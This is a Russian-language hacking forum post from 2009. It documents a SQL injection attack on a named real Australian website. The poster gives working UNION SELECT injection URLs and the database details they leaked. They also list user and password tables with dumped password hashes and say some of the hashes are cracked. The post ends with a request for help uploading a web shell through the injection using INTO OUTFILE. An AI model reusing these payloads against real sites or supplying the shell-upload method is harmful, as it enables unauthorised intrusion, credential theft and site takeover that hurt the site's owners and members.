08.01.2009, 17:37
|
|
Новичок
Регистрация: 22.12.2008
Сообщений: 11
Провел на форуме:
64392
Репутация:
2
|
|
http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12--
user(): mypca1005@ws-shared-9.private.netregistry.net
version(): 5.0.32-Debian_7etch6-log
database(): pca_pca_org_au
PR: 5
нашёл таблицу tblmemberlogin, в ней одно поле "txtPassword"
в таблице всего два хэша:
b334044a3535f437c14f24c1e76ae3fb
5f4dcc3b5aa765d61d8327deb882cf99  assword
логина нет (толком не искал) Порыл чуть глубже - нашел поинтереснее табличку tbluser
В ней intUserLevel , txtUsername , txtPassword
http://www.pca.org.au/?id=-8+union+select+1,2,concat(intUserLevel,0x3a,txtUse rname,0x3a,txtPassword),4,5,6,7,8,9,10,11,12+from+ tbluser+limit+13,1--
По лимитам вроде 13 юзеров. Пару хэшей расшифровал, но что-то не пускает в админку ... пох 
У меня вот какой вопрос , а точнее ПРОСЬБА !
Может кто-нить показать на примере (любом, хоть одном из тех, что здесь выкладывают), как через скуль залить шелл ? Не через админку , а именно через скуль (into+outfile конструкция вроде используется или как там?).
Инфу почитал на нескольких форумах, но не до конца все понятно ...
Если не трудно кому-нибудь - покажите плиз на примере, как это сделать. Думаю многим полезно будет ...
|
|
|